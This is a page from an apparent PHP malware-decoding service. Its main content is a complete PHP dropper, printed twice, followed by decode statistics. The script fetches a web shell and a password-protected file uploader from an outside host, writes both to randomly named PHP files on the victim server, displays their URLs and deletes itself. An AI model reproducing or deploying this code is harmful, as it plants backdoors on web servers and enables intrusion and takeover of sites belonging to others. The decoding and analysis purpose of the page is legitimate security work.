Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php // I could not have a more welcome visitor 64 group of zain ..
Decoded Output download
<?php
// I could not have a more welcome visitor 64 group of zain bani
$shell=curl('http://rootinabox.com/shell_olux.txt');
$link = str_replace(basename(__FILE__),'','http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
$file1=mt_rand_str(6).".php";
$file2=mt_rand_str(5).".php";
$password=mt_rand_str(4);
$save=fopen($file1,'w');fwrite($save,$shell);fclose($save);$uploader=curl('http://rootinabox.com/simple_upload.txt'); $uploader=str_replace('jBYvM',$password,$uploader); $save=fopen($file2,'w');fwrite($save,$uploader);fclose($save);
function mt_rand_str ($l, $c = 'abcdefghijklmnopqrstuvwxyz1234567890') {
for ($s = '', $cl = strlen($c)-1, $i = 0; $i < $l; $s .= $c[mt_rand(0, $cl)], ++$i);
return $s;
}
function curl($url) { $html=file_get_contents($url); if(!empty($html)){ return $html;}
$curl = curl_init(); curl_setopt($curl, CURLOPT_TIMEOUT, 40); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); if (stristr($url,"https://")) { curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($curl, CURLOPT_HEADER, false); return curl_exec ($curl); }
?>
<shell><font color="red"><center> Shell : <?php echo $link.$file1;?></center></font><br></shell><up><font color="green"><center> Up : <?php echo $link.$file2.'?bajatax='.$password;?></center></font><br></up><?php unlink(__FILE__); ?>
Did this file decode correctly?
Original Code
<?php
// I could not have a more welcome visitor 64 group of zain bani
$shell=curl('http://rootinabox.com/shell_olux.txt');
$link = str_replace(basename(__FILE__),'','http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
$file1=mt_rand_str(6).".php";
$file2=mt_rand_str(5).".php";
$password=mt_rand_str(4);
$save=fopen($file1,'w');fwrite($save,$shell);fclose($save);$uploader=curl('http://rootinabox.com/simple_upload.txt'); $uploader=str_replace('jBYvM',$password,$uploader); $save=fopen($file2,'w');fwrite($save,$uploader);fclose($save);
function mt_rand_str ($l, $c = 'abcdefghijklmnopqrstuvwxyz1234567890') {
for ($s = '', $cl = strlen($c)-1, $i = 0; $i < $l; $s .= $c[mt_rand(0, $cl)], ++$i);
return $s;
}
function curl($url) { $html=file_get_contents($url); if(!empty($html)){ return $html;}
$curl = curl_init(); curl_setopt($curl, CURLOPT_TIMEOUT, 40); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); if (stristr($url,"https://")) { curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($curl, CURLOPT_HEADER, false); return curl_exec ($curl); }
?>
<shell><font color="red"><center> Shell : <?php echo $link.$file1;?></center></font><br></shell><up><font color="green"><center> Up : <?php echo $link.$file2.'?bajatax='.$password;?></center></font><br></up><?php unlink(__FILE__); ?>
Function Calls
curl | 1 |
Stats
MD5 | 07bcafb20bea686a0c4ad918118b7e0e |
Eval Count | 0 |
Decode Time | 113 ms |